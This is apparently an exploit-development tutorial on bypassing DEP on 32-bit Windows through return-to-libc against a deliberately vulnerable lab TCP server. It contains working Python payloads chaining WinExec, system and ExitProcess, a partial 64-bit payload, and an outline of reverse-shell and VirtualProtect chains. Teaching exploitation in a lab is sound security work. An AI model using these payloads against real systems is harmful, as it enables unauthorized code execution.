Return-to-libc on Windows
In the Linux ret2libc article, we bypassed DEP by calling system("/bin/sh") from libc. The concept on Windows is identical — call existing functions instead of injecting shellcode — but the details differ: different libraries, different calling conventions, different target functions, and different tools.
If you’re coming from the Windows buffer overflow tutorial where we used x32dbg and disabled DEP with CFF Explorer, this article picks up where that left off — but now DEP stays on.
The Windows Landscape
On Linux, the C runtime (libc) gives us system(). On Windows, we have several libraries loaded into every process:
| Library | Key Functions for ret2libc |
|---|---|
| kernel32.dll | WinExec(), CreateProcessA(), LoadLibraryA(), VirtualProtect() |
| msvcrt.dll | system(), _exec() — C runtime functions |
| ntdll.dll | Low-level NT API — NtProtectVirtualMemory(), etc. |
| user32.dll | MessageBoxA() — useful for proof of concept |
The easiest targets:
WinExec("cmd.exe", 0)— 2 arguments, launches a command. Simplest option.system("cmd.exe")— Same as Linux, from msvcrt.dll. One argument.VirtualProtect()— Make the stack executable, then jump to shellcode. More complex but more powerful.
We’ll start with WinExec because it’s the most straightforward.
Calling Conventions — The Critical Difference
This is where Windows and Linux diverge, and where most cross-platform exploit devs get confused.
32-bit: stdcall vs cdecl
On Linux, most functions use cdecl — arguments pushed right-to-left, caller cleans the stack.
On Windows, most Win32 API functions use stdcall — arguments pushed right-to-left, callee cleans the stack.
Why does this matter? After WinExec returns (stdcall), it pops its own arguments off the stack. ESP is in a different position than it would be after a cdecl function. This changes how we chain calls.
cdecl (Linux libc):
Before call: ESP → [ret_addr] [arg1] [arg2]
After return: ESP → [arg1] [arg2] ← Caller must clean up
stdcall (Windows API):
Before call: ESP → [ret_addr] [arg1] [arg2]
After return: ESP → (past arg2) ← Callee already cleaned up
For a single ret2libc call, this difference doesn’t matter much — the function returns to whatever address was on the stack. But for chaining multiple calls, stdcall is actually easier — the callee cleans up, so we don’t need pop; ret gadgets between calls.
msvcrt.dll’s system() uses cdecl (it’s a C runtime function, not a Win32 API). So system() on Windows behaves exactly like on Linux. WinExec() uses stdcall.
64-bit: Microsoft x64 Calling Convention
On 64-bit Windows, the first 4 arguments go in registers RCX, RDX, R8, R9 (not RDI, RSI like Linux). And there’s a twist: the caller must reserve 32 bytes of shadow space on the stack, even if the function has fewer than 4 arguments.
Microsoft x64:
RCX = arg 1
RDX = arg 2
R8 = arg 3
R9 = arg 4
Stack: [shadow 32 bytes] [arg 5] [arg 6] ...
Linux System V x64:
RDI = arg 1
RSI = arg 2
RDX = arg 3
RCX = arg 4
R8 = arg 5
R9 = arg 6
The shadow space is the main gotcha. If you forget it, the function writes to memory it shouldn’t and crashes. We’ll cover this in the 64-bit section.
Setting Up the Lab
Same vulnerable TCP server from the Windows buffer overflow tutorial:
void handle_client(SOCKET client) {
char buffer[512];
int recv_size;
recv_size = recv(client, buffer, 1024, 0); // Overflow!
buffer[recv_size] = '\0';
printf("Received: %s\n", buffer);
closesocket(client);
}
Environment:
- Windows 7 32-bit (target)
- DEP enabled (we do NOT disable it this time)
- ASLR disabled (via CFF Explorer — set DllCharacteristics to
0x0100for DEP-only, not0x0000) - x32dbg for debugging
To keep ASLR off but DEP on, set the DllCharacteristics to 0x0100 (NX_COMPAT only, no DYNAMIC_BASE).
Finding Addresses with x32dbg
Launch the vulnerable server inside x32dbg. Once the process is running, we need to find our target functions and strings.
Finding WinExec
WinExec lives in kernel32.dll. In x32dbg:
- Go to the Symbols tab
- Select kernel32.dll from the module list
- Search for “WinExec” in the search bar
- Note the address
Or use the command bar:
x32dbg> GetProcAddress kernel32.dll, WinExec
Let’s say we find: WinExec = 0x7C8623AD (this varies by Windows version and patch level).
Finding system() in msvcrt.dll
If msvcrt.dll is loaded (it is for most C programs):
- Symbols tab → select msvcrt.dll
- Search for “system”
Let’s say: system = 0x77C293C7
Finding “cmd.exe” String
We need the string "cmd.exe" somewhere in readable memory. Options:
Option A: Search loaded modules
x32dbg → Memory Map tab → Right-click a module → Search for → String references → search “cmd”
Many Windows DLLs contain the string “cmd.exe” or “cmd” internally. If you find one, note its address.
Option B: Search the binary itself
x32dbg> findall "cmd.exe"
Option C: Use our buffer
We can place “cmd.exe” in our overflow payload and reference it by its stack address. This is less reliable (stack address changes), but works when ASLR is off.
Let’s say we find "cmd.exe" at 0x7C8369B0 inside kernel32.dll.
Finding exit() or ExitProcess()
For clean termination:
ExitProcess in kernel32.dll: 0x7C81CAFA
Exploit 1: WinExec(“cmd.exe”, 0) — 32-bit stdcall
WinExec has two parameters:
UINT WinExec(
LPCSTR lpCmdLine, // Command to execute ("cmd.exe")
UINT uCmdShow // Window display (0 = SW_HIDE, 1 = SW_SHOWNORMAL)
);
Since stdcall pushes arguments right-to-left, the stack layout before WinExec executes:
ESP → [return address] ← Where WinExec returns to
ESP+4 [lpCmdLine] ← pointer to "cmd.exe"
ESP+8 [uCmdShow] ← 0 (hidden) or 1 (visible)
Wait — stdcall arguments are pushed right-to-left by the caller before the call instruction. But we’re arriving via ret, not call. So from WinExec’s perspective when it starts:
ESP → [return address after WinExec]
ESP+4 [lpCmdLine = "cmd.exe" pointer]
ESP+8 [uCmdShow = 0 or 1]
This is the same layout as Linux ret2libc, just with an extra argument.
The Payload
import socket
import struct
p = lambda x: struct.pack("<I", x)
ip = "192.168.64.15"
port = 9999
offset = 528 # padding to EIP (524 to EBP + 4 for EBP)
winexec = p(0x7C8623AD) # WinExec in kernel32.dll
exit_proc = p(0x7C81CAFA) # ExitProcess in kernel32.dll
cmd_str = p(0x7C8369B0) # "cmd.exe" string in kernel32.dll
show_window = p(0x00000001) # SW_SHOWNORMAL (1) — so we can see the cmd window
# Stack layout after ret:
# [padding] [WinExec] [ExitProcess] [cmd_str] [show_window]
# ↑ EIP ↑ return addr ↑ arg1 ↑ arg2
payload = b"A" * offset
payload += winexec # Overwrite EIP → jump to WinExec
payload += exit_proc # WinExec's return address → ExitProcess
payload += cmd_str # arg1: lpCmdLine = "cmd.exe"
payload += show_window # arg2: uCmdShow = 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()
Wait — stdcall cleanup affects chaining. After WinExec returns, it cleans up 2 arguments (8 bytes) from the stack. So ESP moves past both cmd_str and show_window. The return address (ExitProcess) is consumed by WinExec’s ret instruction, and ExitProcess executes cleanly.
For a single call, this just works.
Debugging in x32dbg
Set a breakpoint at the ret instruction of the vulnerable function. Send the payload.
x32dbg breakpoint hit.
Registers:
EIP = 0x0804xxxx (about to execute ret)
ESP = 0x0022F9B0
Stack at ESP:
0x0022F9B0: 0x7C8623AD ← WinExec (will be popped into EIP)
0x0022F9B4: 0x7C81CAFA ← ExitProcess (WinExec's return address)
0x0022F9B8: 0x7C8369B0 ← "cmd.exe" pointer (arg1)
0x0022F9BC: 0x00000001 ← SW_SHOWNORMAL (arg2)
Step into the ret:
EIP = 0x7C8623AD (WinExec!)
ESP = 0x0022F9B4 (past the popped address)
WinExec reads:
[ESP]=0x7C81CAFA→ return address (ExitProcess)[ESP+4]=0x7C8369B0→ derefs to “cmd.exe”[ESP+8]=0x00000001→ SW_SHOWNORMAL
Continue execution → cmd.exe window appears.
Exploit 2: system(“cmd.exe”) via msvcrt.dll
If msvcrt.dll is loaded, we can use system() — which uses cdecl, behaving exactly like Linux.
system_addr = p(0x77C293C7) # system() in msvcrt.dll
exit_proc = p(0x7C81CAFA) # ExitProcess
cmd_str = p(0x7C8369B0) # "cmd.exe"
payload = b"A" * offset
payload += system_addr # EIP → system()
payload += exit_proc # system's return address → ExitProcess
payload += cmd_str # system's argument: "cmd.exe"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()
Identical layout to Linux ret2libc. cdecl is cdecl regardless of OS.
Chaining Functions — stdcall Makes It Easier
Here’s where stdcall actually helps us. Since the callee cleans up its own arguments, we don’t need pop; ret gadgets between calls.
Example: Call LoadLibraryA("ws2_32.dll") then WinExec("cmd.exe", 1):
stdcall chain:
[padding] [LoadLibraryA] [WinExec] [ptr "ws2_32.dll"] [ptr "cmd.exe"] [1]
↑ EIP ↑ return ↑ LoadLib arg1 ↑ WinExec arg1 ↑ arg2
After LoadLibraryA returns:
- It cleans its 1 argument (4 bytes) from the stack
retpopsWinExecaddress into EIP- ESP now points to
cmd_str— exactly where WinExec expects its first argument
No gadgets needed. stdcall’s cleanup behavior naturally chains function calls.
Compare to cdecl (Linux):
cdecl chain (needs pop;ret gadgets):
[padding] [setuid] [pop;ret] [0] [system] [exit] ["/bin/sh"]
On Linux, we needed a pop; ret gadget to clean up setuid’s argument before system(). On Windows with stdcall, the function does it for us.
The catch: The number of arguments must match exactly. If a stdcall function expects 2 arguments, it pops 8 bytes. If you get the argument count wrong, the stack is misaligned and the chain breaks.
Exploit 3: Reverse Shell — Chaining Multiple Calls
For a remote exploit, a cmd.exe window on the target machine isn’t useful — we need a reverse shell. This requires chaining several calls to load WinSock and connect back to us.
This gets complex enough that ROP is usually the better approach. But here’s the conceptual chain:
1. LoadLibraryA("ws2_32.dll") → Load WinSock library
2. WSAStartup(0x0202, &wsadata) → Initialize WinSock
3. WSASocketA(2, 1, 0, 0, 0, 0) → Create a TCP socket
4. connect(sock, &sockaddr, 16) → Connect to attacker
5. CreateProcessA(NULL, "cmd.exe", ..., &startupinfo, ...) → Spawn cmd with redirected I/O
Each function has multiple arguments, and CreateProcessA has 10 parameters. Managing this with ret2libc alone is painful — this is exactly where ROP chains become necessary.
For practical remote exploitation on Windows, the typical approach is:
ret2libc: VirtualProtect(stack, 0x1000, PAGE_EXECUTE_READWRITE, &old)
↓
Stack is now executable
↓
Jump to shellcode on the stack (reverse shell shellcode from msfvenom)
This combines ret2libc (one function call to disable DEP for our stack region) with traditional shellcode execution.
64-bit Windows — The Shadow Space Problem
On 64-bit Windows, the calling convention is Microsoft x64 fastcall:
- First 4 arguments: RCX, RDX, R8, R9
- The caller must allocate 32 bytes of shadow space on the stack before the call
- Additional arguments go on the stack after the shadow space
Stack layout for a function call (64-bit Windows):
RSP → [return address]
RSP+8 [shadow space: 32 bytes (even if unused)]
RSP+40 [5th argument, if any]
RSP+48 [6th argument, if any]
The shadow space exists so the callee can spill the register arguments to the stack if needed. The callee expects this space to be there — if it’s not, the function writes to memory it shouldn’t and crashes.
ret2libc on 64-bit Windows
We need gadgets to:
- Load RCX with the first argument (
pop rcx; ret) - Ensure 32 bytes of shadow space exist below the function’s return point
from struct import pack
p64 = lambda x: pack("<Q", x)
offset = 72 # varies per binary
pop_rcx = p64(0x00007FFA1234ABCD) # pop rcx; ret (from a loaded DLL)
cmd_str = p64(0x00007FFA56789012) # "cmd.exe" string address
winexec = p64(0x00007FFA11223344) # WinExec address
ret = p64(0x00007FFA1234ABCE) # ret gadget (alignment)
exit_p = p64(0x00007FFA55667788) # ExitProcess
payload = b"A" * offset
payload += pop_rcx # Load first arg into RCX
payload += cmd_str # RCX = "cmd.exe"
payload += p64(0x00000000) # RDX = 0 (second arg — uCmdShow)
# Actually need pop rdx; ret here too
payload += ret # Alignment
payload += winexec # Call WinExec
# Shadow space and additional stack setup needed...
In practice, 64-bit Windows ret2libc almost always requires ROP gadgets to set up registers — the line between ret2libc and ROP disappears entirely on 64-bit.
Finding Addresses in x32dbg — Quick Reference
Finding functions:
Symbols tab → Select module (kernel32, msvcrt, ntdll)
→ Search for function name
→ Note the address
Finding strings:
Memory Map → Right-click module → Search for → String references
Or: CPU tab → Right-click → Search for → All referenced strings
Finding gadgets (for chaining):
Plugins → OllyDumpEx or use ROPgadget externally:
$ ROPgadget --binary kernel32.dll --search "pop ecx"
Setting breakpoints:
Command bar: bp 0x7C8623AD (break on WinExec)
Or: Ctrl+G → enter address → F2
Examining the stack:
Stack panel shows ESP and values
Or: dump at ESP in the hex dump panel
Checking DEP status:
Debug → Memory Map → check page permissions
Stack pages should show "RW" (not "RWX")
Comparison — Linux vs Windows ret2libc
| Aspect | Linux | Windows |
|---|---|---|
| Target function | system("/bin/sh") |
WinExec("cmd.exe", 1) or system("cmd.exe") |
| Library | libc.so | kernel32.dll, msvcrt.dll |
| 32-bit convention | cdecl (caller cleans) | stdcall (callee cleans) for API, cdecl for CRT |
| 64-bit convention | System V (rdi, rsi, rdx) | MS x64 (rcx, rdx, r8, r9 + 32-byte shadow) |
| Chaining (32-bit) | Needs pop; ret between calls |
stdcall chains naturally (callee cleans) |
| String availability | “/bin/sh” in libc | “cmd.exe” sometimes in kernel32 (search required) |
| Debugger | GDB | x32dbg / x64dbg |
| DEP control | Compile flags / sysctl | PE header DllCharacteristics |
| Gadget tools | ROPgadget, ropper | ROPgadget, ropper, mona.py (Immunity) |
The fundamental technique is the same. You’re overwriting the return address with a function pointer and arranging arguments on the stack. The OS-specific details are calling conventions, target functions, and tooling.
When ret2libc Isn’t Enough
Just like on Linux, Windows ret2libc has limitations:
- Complex payloads (reverse shells) require too many chained calls
- 64-bit requires register gadgets anyway (it’s already ROP)
- ASLR randomizes kernel32.dll and msvcrt.dll base addresses
The most common Windows DEP bypass in practice:
ROP chain → VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old)
→ Stack is now executable
→ Jump to shellcode on the stack
This requires a full ROP chain to set up VirtualProtect’s 4 arguments, but the result is powerful — you get unrestricted code execution via shellcode once DEP is disabled for your stack region.
For building Windows ROP chains, mona.py (a plugin for Immunity Debugger) is the gold standard:
!mona rop -m kernel32.dll,msvcrt.dll
!mona rop -m * -cpb "\x00\x0a\x0d"
It automatically finds gadgets and generates VirtualProtect / VirtualAlloc ROP chains.
Final Thoughts
ret2libc on Windows follows the same principle as Linux — reuse existing code to bypass DEP. The main differences are the calling conventions (stdcall vs cdecl, shadow space on 64-bit) and the target functions (WinExec, CreateProcess, VirtualProtect instead of system and execve).
If you’re comfortable with the Linux ret2libc and the Windows buffer overflow, this article bridges the two. The next step — building full ROP chains on Windows — is where the real power lies, especially the VirtualProtect technique that re-enables shellcode execution.
Happy reversing!